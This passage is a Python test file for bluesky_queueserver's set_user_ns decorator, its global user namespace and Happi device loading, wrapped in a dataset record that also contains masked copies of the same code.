"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import os
import inspect
import pytest
from ._common import copy_default_profile_collection, patch_first_startup_file
from bluesky_queueserver.manager.profile_tools import global_user_namespace, load_devices_from_happi
from bluesky_queueserver.manager.profile_ops import load_profile_collection
def create_local_imports_files(tmp_path):
path_dir = os.path.join(tmp_path, "dir_local_imports")
fln_func = os.path.join(path_dir, "file_func.py")
fln_gen = os.path.join(path_dir, "file_gen.py")
os.makedirs(path_dir, exist_ok=True)
# Create file1
code1 = """
from bluesky_queueserver.manager.profile_tools import set_user_ns
# Function that has the parameter 'ipython'
@set_user_ns
def f1(some_value, user_ns, ipython):
user_ns["func_was_called"] = "func_was_called"
return (some_value, user_ns["v_from_namespace"], bool(ipython))
# Function that has no parameter 'ipython'
@set_user_ns
def f1a(some_value, user_ns):
user_ns["func_A_was_called"] = "func_was_called"
return (some_value, user_ns["v_from_namespace"])
"""
with open(fln_func, "w") as f:
f.writelines(code1)
# Create file2
code2 = """
from bluesky_queueserver.manager.profile_tools import set_user_ns
# Function that has the parameter 'ipython'
@set_user_ns
def f2(some_value, user_ns, ipython):
user_ns["gen_was_called"] = "gen_was_called"
yield (some_value, user_ns["v_from_namespace"], bool(ipython))
# Function that has no parameter 'ipython'
@set_user_ns
def f2a(some_value, user_ns):
user_ns["gen_A_was_called"] = "gen_was_called"
yield (some_value, user_ns["v_from_namespace"])
@set_user_ns
def f3(some_value, user_ns, ipython):
user_ns["value_f3"] = some_value
f3(91)
"""
with open(fln_gen, "w") as f:
f.writelines(code2)
patch_code = """
from dir_local_imports.file_func import f1, f1a
from dir_local_imports.file_gen import f2, f2a
from bluesky_queueserver.manager.profile_tools import set_user_ns
@set_user_ns
def f4(some_value, user_ns, ipython):
user_ns["value_f4"] = some_value
f4(90)
"""
def test_set_user_ns_1(tmp_path):
"""
Tests for ``set_user_ns`` decorator. The functionality of the decorator
is fully tested (only without IPython):
- using ``global_user_namespace`` to pass values in and out of the function
defined in the imported module (emulation of ``get_ipython().user_ns``).
- checking if the function is executed from IPython (only for the function
defined in the imported module).
"""
pc_path = copy_default_profile_collection(tmp_path)
create_local_imports_files(pc_path)
patch_first_startup_file(pc_path, patch_code)
nspace = load_profile_collection(pc_path)
assert len(nspace) > 0, "Failed to load the profile collection"
assert "f1" in nspace, "Test for local imports failed"
assert "f2" in nspace, "Test for local imports failed"
# Test if the decorator `set_user_ns` does not change function type
assert inspect.isgeneratorfunction(nspace["f1"]) is False
assert inspect.isgeneratorfunction(nspace["f2"]) is True
# Check if the extra arguments are removed from the function signature
def check_signature(func):
params = inspect.signature(func).parameters
assert "user_ns" not in params
assert "ipython" not in params
check_signature(nspace["f1"])
check_signature(nspace["f1a"])
check_signature(nspace["f2"])
check_signature(nspace["f2a"])
assert nspace["value_f3"] == 91
assert nspace["value_f4"] == 90
# Test function
global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)
global_user_namespace.user_ns["v_from_namespace"] = "value-sent-to-func"
assert nspace["v_from_namespace"] == "value-sent-to-func"
result_func = nspace["f1"](60)
assert nspace["func_was_called"] == "func_was_called"
assert result_func[0] == 60
assert result_func[1] == "value-sent-to-func"
assert result_func[2] is False
result_func = nspace["f1a"](65)
assert nspace["func_A_was_called"] == "func_was_called"
assert result_func[0] == 65
assert result_func[1] == "value-sent-to-func"
# Test generator
global_user_namespace.user_ns["v_from_namespace"] = "value-sent-to-gen"
result_func = list(nspace["f2"](110))[0]
assert nspace["gen_was_called"] == "gen_was_called"
assert result_func[0] == 110
assert result_func[1] == "value-sent-to-gen"
assert result_func[2] is False
result_func = list(nspace["f2a"](115))[0]
assert nspace["gen_A_was_called"] == "gen_was_called"
assert result_func[0] == 115
assert result_func[1] == "value-sent-to-gen"
def test_global_user_namespace():
"""
Basic test for ``global_user_namespace``.
"""
ns = {"ab": 1, "cd": 2}
global_user_namespace.set_user_namespace(user_ns=ns)
assert global_user_namespace.user_ns == ns
assert global_user_namespace.use_ipython is False
global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)
assert global_user_namespace.user_ns == {}
assert global_user_namespace.use_ipython is True
global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)
assert global_user_namespace.user_ns == ns
assert global_user_namespace.use_ipython is False
_happi_json_db_1 = """
{
"det": {
"_id": "det",
"active": true,
"args": [],
"device_class": "ophyd.sim.DetWithCountTime",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "det",
"type": "OphydItem"
},
"motor": {
"_id": "motor",
"active": true,
"args": [],
"device_class": "ophyd.sim.SynAxisNoPosition",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "motor",
"type": "OphydItem"
},
"motor1": {
"_id": "motor1",
"active": true,
"args": [],
"device_class": "ophyd.sim.SynAxisNoHints",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "motor1",
"type": "OphydItem"
},
"tst_motor2": {
"_id": "tst_motor2",
"active": true,
"args": [],
"device_class": "ophyd.sim.SynAxisNoHints",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "tst_motor2",
"type": "OphydItem"
},
"motor3": {
"_id": "motor3",
"active": true,
"args": [],
"device_class": "ophyd.sim.SynAxis",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "motor3",
"type": "OphydItem"
},
"motor3_duplicate_error": {
"_id": "motor3",
"active": false,
"args": [],
"device_class": "ophyd.sim.SynAxis",
"documentation": null,
"kwargs": {
"name": "{{name}}"
},
"name": "motor3",
"type": "OphydItem"
}
}
"""
def _configure_happi(tmp_path, monkeypatch, json_devices):
path_json = os.path.join(tmp_path, "sim_devices.json")
path_ini = os.path.join(tmp_path, "happi.ini")
happi_ini_text = f"[DEFAULT]\nbackend=json\npath={path_json}"
with open(path_ini, "w") as f:
f.write(happi_ini_text)
with open(path_json, "w") as f:
f.write(json_devices)
monkeypatch.setenv("HAPPI_CFG", path_ini)
# fmt: off
@pytest.mark.parametrize("device_names, loaded_names, kw_args, success, errmsg", [
([], [], {}, True, ""), # No devices are loaded if the list of devices is empty
(("det", "motor"), ("det", "motor"), {}, True, ""),
(["det", "motor"], ("det", "motor"), {}, True, ""),
((("det", ""), ["motor", ""]), ("det", "motor"), {}, True, ""),
(("det", ["motor", ""]), ("det", "motor"), {}, True, ""),
(("det", ("motor", ""), ("tst_motor2", "motor2")), ("det", "motor", "motor2"), {}, True, ""),
# This is not typical use case, but the same device may be loaded multiple times
# with different names if needed.
((("motor1", "motor1_copy1"), ("motor1", "motor1_copy2")), ("motor1_copy1", "motor1_copy2"), {}, True, ""),
# Incorrect type of the device list
(10, ("det", "motor"), {}, False, "Parameter 'device_names' value must be a tuple or a list"),
("string", ("det", "motor"), {}, False, "Parameter 'device_names' value must be a tuple or a list"),
# Incorrecty type or form of a device list element
(("det", 10), ("det", "motor"), {}, False, "Parameter 'device_names': element .* must be str, tuple or list"),
((10, "motor"), ("det", "motor"), {}, False,
"Parameter 'device_names': element .* must be str, tuple or list"),
(("det", (10, "motor2")), ("det", "motor"), {}, False, "element .* is expected to be in the form"),
(("det", ("tst_motor2", 10)), ("det", "motor"), {}, False, "element .* is expected to be in the form"),
(("det", ("tst_motor2", "motor2", 10)), ("det", "motor"), {}, False,
"element .* is expected to be in the form"),
# No device found
(("det", "motor10"), ("det", "motor10"), {}, False, "No devices with name"),
# Multiple devices found (search for "motor3" yields multile devices, this is database issue)
(("det", "motor3"), ("det", "motor3"), {}, False, "Multiple devices with name"),
# Use additional search parameters. (Two entries for "motor3" differ in the value of `active` field.
# A single entry for `det` has `active==True`.)
(("det", "motor3"), ("det", "motor3"), {"active": True}, True, ""),
(("det", "motor3"), ("det", "motor3"), {"active": False}, False,
"No devices with name 'det' were found in Happi database."),
(("motor3",), ("motor3",), {"active": False}, True, ""),
# Verify that valid device names are accepted
(("det", ["motor", "motor3_new"]), ("det", "motor3_new"), {}, True, ""),
# Invalid new device name
(("det", ["motor", "Motor"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "moTor"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "_motor"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", " motor"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "motor "]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "motor new"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "motor_$new"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
(("det", ["motor", "2motor_$new"]), ("det", "motor"), {}, False, "may consist of lowercase letters, numbers"),
])
# fmt: on
def test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names, loaded_names, kw_args, success, errmsg):
"""
Tests for ``load_devices_from_happi``.
"""
_configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)
# Load as a dictionary
if success:
ns = {}
dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)
assert len(ns) == len(loaded_names), str(ns)
for d in loaded_names:
assert d in ns
assert set(dlist) == set(loaded_names)
else:
with pytest.raises(Exception, match=errmsg):
ns = {}
load_devices_from_happi(device_names, namespace=ns, **kw_args)
# Load in local namespace
def _test_loading(device_names, loaded_names):
if success:
load_devices_from_happi(device_names, namespace=locals(), **kw_args)
for d in loaded_names:
assert d in locals()
else:
with pytest.raises(Exception, match=errmsg):
load_devices_from_happi(device_names, namespace=locals(), **kw_args)
_test_loading(device_names=device_names, loaded_names=loaded_names)
def test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):
    """
    Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.
    """
    _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)

    def _expect_type_error(message, *args, **kwargs):
        # Helper: the call must raise ``TypeError`` matching ``message``.
        with pytest.raises(TypeError, match=message):
            load_devices_from_happi(*args, **kwargs)

    # Missing 'namespace' parameter
    _expect_type_error(
        "missing 1 required keyword-only argument: 'namespace'",
        ["det", "motor"],
    )
    # Incorrect type of 'namespace' parameter
    _expect_type_error(
        "Parameter 'namespace' must be a dictionary",
        ["det", "motor"],
        namespace=[1, 2, 3],
    )
|
normal
|
{
"blob_id": "ad1ec5dd8fae290ab6cb73b17c5522e062261359",
"index": 6698,
"step-1": "<mask token>\n\n\ndef create_local_imports_files(tmp_path):\n path_dir = os.path.join(tmp_path, 'dir_local_imports')\n fln_func = os.path.join(path_dir, 'file_func.py')\n fln_gen = os.path.join(path_dir, 'file_gen.py')\n os.makedirs(path_dir, exist_ok=True)\n code1 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f1(some_value, user_ns, ipython):\n user_ns[\"func_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f1a(some_value, user_ns):\n user_ns[\"func_A_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"])\n\n\"\"\"\n with open(fln_func, 'w') as f:\n f.writelines(code1)\n code2 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f2(some_value, user_ns, ipython):\n user_ns[\"gen_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f2a(some_value, user_ns):\n user_ns[\"gen_A_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"])\n\n@set_user_ns\ndef f3(some_value, user_ns, ipython):\n user_ns[\"value_f3\"] = some_value\n\nf3(91)\n\n\"\"\"\n with open(fln_gen, 'w') as f:\n f.writelines(code2)\n\n\n<mask token>\n\n\ndef test_set_user_ns_1(tmp_path):\n \"\"\"\n Tests for ``set_user_ns`` decorator. 
The functionality of the decorator\n is fully tested (only without IPython):\n - using ``global_user_namespace`` to pass values in and out of the function\n defined in the imported module (emulation of ``get_ipython().user_ns``).\n - checking if the function is executed from IPython (only for the function\n defined in the imported module).\n \"\"\"\n pc_path = copy_default_profile_collection(tmp_path)\n create_local_imports_files(pc_path)\n patch_first_startup_file(pc_path, patch_code)\n nspace = load_profile_collection(pc_path)\n assert len(nspace) > 0, 'Failed to load the profile collection'\n assert 'f1' in nspace, 'Test for local imports failed'\n assert 'f2' in nspace, 'Test for local imports failed'\n assert inspect.isgeneratorfunction(nspace['f1']) is False\n assert inspect.isgeneratorfunction(nspace['f2']) is True\n\n def check_signature(func):\n params = inspect.signature(func).parameters\n assert 'user_ns' not in params\n assert 'ipython' not in params\n check_signature(nspace['f1'])\n check_signature(nspace['f1a'])\n check_signature(nspace['f2'])\n check_signature(nspace['f2a'])\n assert nspace['value_f3'] == 91\n assert nspace['value_f4'] == 90\n global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-func'\n assert nspace['v_from_namespace'] == 'value-sent-to-func'\n result_func = nspace['f1'](60)\n assert nspace['func_was_called'] == 'func_was_called'\n assert result_func[0] == 60\n assert result_func[1] == 'value-sent-to-func'\n assert result_func[2] is False\n result_func = nspace['f1a'](65)\n assert nspace['func_A_was_called'] == 'func_was_called'\n assert result_func[0] == 65\n assert result_func[1] == 'value-sent-to-func'\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-gen'\n result_func = list(nspace['f2'](110))[0]\n assert nspace['gen_was_called'] == 'gen_was_called'\n assert result_func[0] == 110\n assert result_func[1] == 
'value-sent-to-gen'\n assert result_func[2] is False\n result_func = list(nspace['f2a'](115))[0]\n assert nspace['gen_A_was_called'] == 'gen_was_called'\n assert result_func[0] == 115\n assert result_func[1] == 'value-sent-to-gen'\n\n\ndef test_global_user_namespace():\n \"\"\"\n Basic test for ``global_user_namespace``.\n \"\"\"\n ns = {'ab': 1, 'cd': 2}\n global_user_namespace.set_user_namespace(user_ns=ns)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)\n assert global_user_namespace.user_ns == {}\n assert global_user_namespace.use_ipython is True\n global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n\n<mask token>\n\n\[email protected]('device_names, loaded_names, kw_args, success, errmsg'\n , [([], [], {}, True, ''), (('det', 'motor'), ('det', 'motor'), {}, \n True, ''), (['det', 'motor'], ('det', 'motor'), {}, True, ''), ((('det',\n ''), ['motor', '']), ('det', 'motor'), {}, True, ''), (('det', ['motor',\n '']), ('det', 'motor'), {}, True, ''), (('det', ('motor', ''), (\n 'tst_motor2', 'motor2')), ('det', 'motor', 'motor2'), {}, True, ''), ((\n ('motor1', 'motor1_copy1'), ('motor1', 'motor1_copy2')), (\n 'motor1_copy1', 'motor1_copy2'), {}, True, ''), (10, ('det', 'motor'),\n {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n ('string', ('det', 'motor'), {}, False,\n \"Parameter 'device_names' value must be a tuple or a list\"), (('det', \n 10), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 10, 'motor'), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 'det', (10, 'motor2')), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2', 10\n )), 
('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2',\n 'motor2', 10)), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', 'motor10'), (\n 'det', 'motor10'), {}, False, 'No devices with name'), (('det',\n 'motor3'), ('det', 'motor3'), {}, False, 'Multiple devices with name'),\n (('det', 'motor3'), ('det', 'motor3'), {'active': True}, True, ''), ((\n 'det', 'motor3'), ('det', 'motor3'), {'active': False}, False,\n \"No devices with name 'det' were found in Happi database.\"), (('motor3'\n ,), ('motor3',), {'active': False}, True, ''), (('det', ['motor',\n 'motor3_new']), ('det', 'motor3_new'), {}, True, ''), (('det', ['motor',\n 'Motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'moTor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '_motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n ' motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor ']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '2motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers')])\ndef test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names,\n loaded_names, kw_args, success, errmsg):\n \"\"\"\n Tests for ``load_devices_from_happi``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n if success:\n ns = {}\n dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)\n assert len(ns) == len(loaded_names), str(ns)\n for d in 
loaded_names:\n assert d in ns\n assert set(dlist) == set(loaded_names)\n else:\n with pytest.raises(Exception, match=errmsg):\n ns = {}\n load_devices_from_happi(device_names, namespace=ns, **kw_args)\n\n def _test_loading(device_names, loaded_names):\n if success:\n load_devices_from_happi(device_names, namespace=locals(), **kw_args\n )\n for d in loaded_names:\n assert d in locals()\n else:\n with pytest.raises(Exception, match=errmsg):\n load_devices_from_happi(device_names, namespace=locals(),\n **kw_args)\n _test_loading(device_names=device_names, loaded_names=loaded_names)\n\n\ndef test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):\n \"\"\"\n Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n with pytest.raises(TypeError, match=\n \"missing 1 required keyword-only argument: 'namespace'\"):\n load_devices_from_happi(['det', 'motor'])\n with pytest.raises(TypeError, match=\n \"Parameter 'namespace' must be a dictionary\"):\n load_devices_from_happi(['det', 'motor'], namespace=[1, 2, 3])\n",
"step-2": "<mask token>\n\n\ndef create_local_imports_files(tmp_path):\n path_dir = os.path.join(tmp_path, 'dir_local_imports')\n fln_func = os.path.join(path_dir, 'file_func.py')\n fln_gen = os.path.join(path_dir, 'file_gen.py')\n os.makedirs(path_dir, exist_ok=True)\n code1 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f1(some_value, user_ns, ipython):\n user_ns[\"func_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f1a(some_value, user_ns):\n user_ns[\"func_A_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"])\n\n\"\"\"\n with open(fln_func, 'w') as f:\n f.writelines(code1)\n code2 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f2(some_value, user_ns, ipython):\n user_ns[\"gen_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f2a(some_value, user_ns):\n user_ns[\"gen_A_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"])\n\n@set_user_ns\ndef f3(some_value, user_ns, ipython):\n user_ns[\"value_f3\"] = some_value\n\nf3(91)\n\n\"\"\"\n with open(fln_gen, 'w') as f:\n f.writelines(code2)\n\n\n<mask token>\n\n\ndef test_set_user_ns_1(tmp_path):\n \"\"\"\n Tests for ``set_user_ns`` decorator. 
The functionality of the decorator\n is fully tested (only without IPython):\n - using ``global_user_namespace`` to pass values in and out of the function\n defined in the imported module (emulation of ``get_ipython().user_ns``).\n - checking if the function is executed from IPython (only for the function\n defined in the imported module).\n \"\"\"\n pc_path = copy_default_profile_collection(tmp_path)\n create_local_imports_files(pc_path)\n patch_first_startup_file(pc_path, patch_code)\n nspace = load_profile_collection(pc_path)\n assert len(nspace) > 0, 'Failed to load the profile collection'\n assert 'f1' in nspace, 'Test for local imports failed'\n assert 'f2' in nspace, 'Test for local imports failed'\n assert inspect.isgeneratorfunction(nspace['f1']) is False\n assert inspect.isgeneratorfunction(nspace['f2']) is True\n\n def check_signature(func):\n params = inspect.signature(func).parameters\n assert 'user_ns' not in params\n assert 'ipython' not in params\n check_signature(nspace['f1'])\n check_signature(nspace['f1a'])\n check_signature(nspace['f2'])\n check_signature(nspace['f2a'])\n assert nspace['value_f3'] == 91\n assert nspace['value_f4'] == 90\n global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-func'\n assert nspace['v_from_namespace'] == 'value-sent-to-func'\n result_func = nspace['f1'](60)\n assert nspace['func_was_called'] == 'func_was_called'\n assert result_func[0] == 60\n assert result_func[1] == 'value-sent-to-func'\n assert result_func[2] is False\n result_func = nspace['f1a'](65)\n assert nspace['func_A_was_called'] == 'func_was_called'\n assert result_func[0] == 65\n assert result_func[1] == 'value-sent-to-func'\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-gen'\n result_func = list(nspace['f2'](110))[0]\n assert nspace['gen_was_called'] == 'gen_was_called'\n assert result_func[0] == 110\n assert result_func[1] == 
'value-sent-to-gen'\n assert result_func[2] is False\n result_func = list(nspace['f2a'](115))[0]\n assert nspace['gen_A_was_called'] == 'gen_was_called'\n assert result_func[0] == 115\n assert result_func[1] == 'value-sent-to-gen'\n\n\ndef test_global_user_namespace():\n \"\"\"\n Basic test for ``global_user_namespace``.\n \"\"\"\n ns = {'ab': 1, 'cd': 2}\n global_user_namespace.set_user_namespace(user_ns=ns)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)\n assert global_user_namespace.user_ns == {}\n assert global_user_namespace.use_ipython is True\n global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n\n<mask token>\n\n\ndef _configure_happi(tmp_path, monkeypatch, json_devices):\n path_json = os.path.join(tmp_path, 'sim_devices.json')\n path_ini = os.path.join(tmp_path, 'happi.ini')\n happi_ini_text = f'[DEFAULT]\\nbackend=json\\npath={path_json}'\n with open(path_ini, 'w') as f:\n f.write(happi_ini_text)\n with open(path_json, 'w') as f:\n f.write(json_devices)\n monkeypatch.setenv('HAPPI_CFG', path_ini)\n\n\[email protected]('device_names, loaded_names, kw_args, success, errmsg'\n , [([], [], {}, True, ''), (('det', 'motor'), ('det', 'motor'), {}, \n True, ''), (['det', 'motor'], ('det', 'motor'), {}, True, ''), ((('det',\n ''), ['motor', '']), ('det', 'motor'), {}, True, ''), (('det', ['motor',\n '']), ('det', 'motor'), {}, True, ''), (('det', ('motor', ''), (\n 'tst_motor2', 'motor2')), ('det', 'motor', 'motor2'), {}, True, ''), ((\n ('motor1', 'motor1_copy1'), ('motor1', 'motor1_copy2')), (\n 'motor1_copy1', 'motor1_copy2'), {}, True, ''), (10, ('det', 'motor'),\n {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n ('string', ('det', 'motor'), {}, False,\n \"Parameter 'device_names' value must be 
a tuple or a list\"), (('det', \n 10), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 10, 'motor'), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 'det', (10, 'motor2')), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2', 10\n )), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2',\n 'motor2', 10)), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', 'motor10'), (\n 'det', 'motor10'), {}, False, 'No devices with name'), (('det',\n 'motor3'), ('det', 'motor3'), {}, False, 'Multiple devices with name'),\n (('det', 'motor3'), ('det', 'motor3'), {'active': True}, True, ''), ((\n 'det', 'motor3'), ('det', 'motor3'), {'active': False}, False,\n \"No devices with name 'det' were found in Happi database.\"), (('motor3'\n ,), ('motor3',), {'active': False}, True, ''), (('det', ['motor',\n 'motor3_new']), ('det', 'motor3_new'), {}, True, ''), (('det', ['motor',\n 'Motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'moTor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '_motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n ' motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor ']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '2motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers')])\ndef 
test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names,\n loaded_names, kw_args, success, errmsg):\n \"\"\"\n Tests for ``load_devices_from_happi``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n if success:\n ns = {}\n dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)\n assert len(ns) == len(loaded_names), str(ns)\n for d in loaded_names:\n assert d in ns\n assert set(dlist) == set(loaded_names)\n else:\n with pytest.raises(Exception, match=errmsg):\n ns = {}\n load_devices_from_happi(device_names, namespace=ns, **kw_args)\n\n def _test_loading(device_names, loaded_names):\n if success:\n load_devices_from_happi(device_names, namespace=locals(), **kw_args\n )\n for d in loaded_names:\n assert d in locals()\n else:\n with pytest.raises(Exception, match=errmsg):\n load_devices_from_happi(device_names, namespace=locals(),\n **kw_args)\n _test_loading(device_names=device_names, loaded_names=loaded_names)\n\n\ndef test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):\n \"\"\"\n Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n with pytest.raises(TypeError, match=\n \"missing 1 required keyword-only argument: 'namespace'\"):\n load_devices_from_happi(['det', 'motor'])\n with pytest.raises(TypeError, match=\n \"Parameter 'namespace' must be a dictionary\"):\n load_devices_from_happi(['det', 'motor'], namespace=[1, 2, 3])\n",
"step-3": "<mask token>\n\n\ndef create_local_imports_files(tmp_path):\n path_dir = os.path.join(tmp_path, 'dir_local_imports')\n fln_func = os.path.join(path_dir, 'file_func.py')\n fln_gen = os.path.join(path_dir, 'file_gen.py')\n os.makedirs(path_dir, exist_ok=True)\n code1 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f1(some_value, user_ns, ipython):\n user_ns[\"func_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f1a(some_value, user_ns):\n user_ns[\"func_A_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"])\n\n\"\"\"\n with open(fln_func, 'w') as f:\n f.writelines(code1)\n code2 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f2(some_value, user_ns, ipython):\n user_ns[\"gen_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f2a(some_value, user_ns):\n user_ns[\"gen_A_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"])\n\n@set_user_ns\ndef f3(some_value, user_ns, ipython):\n user_ns[\"value_f3\"] = some_value\n\nf3(91)\n\n\"\"\"\n with open(fln_gen, 'w') as f:\n f.writelines(code2)\n\n\npatch_code = \"\"\"\nfrom dir_local_imports.file_func import f1, f1a\nfrom dir_local_imports.file_gen import f2, f2a\n\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n@set_user_ns\ndef f4(some_value, user_ns, ipython):\n user_ns[\"value_f4\"] = some_value\n\nf4(90)\n\n\"\"\"\n\n\ndef test_set_user_ns_1(tmp_path):\n \"\"\"\n Tests for ``set_user_ns`` decorator. 
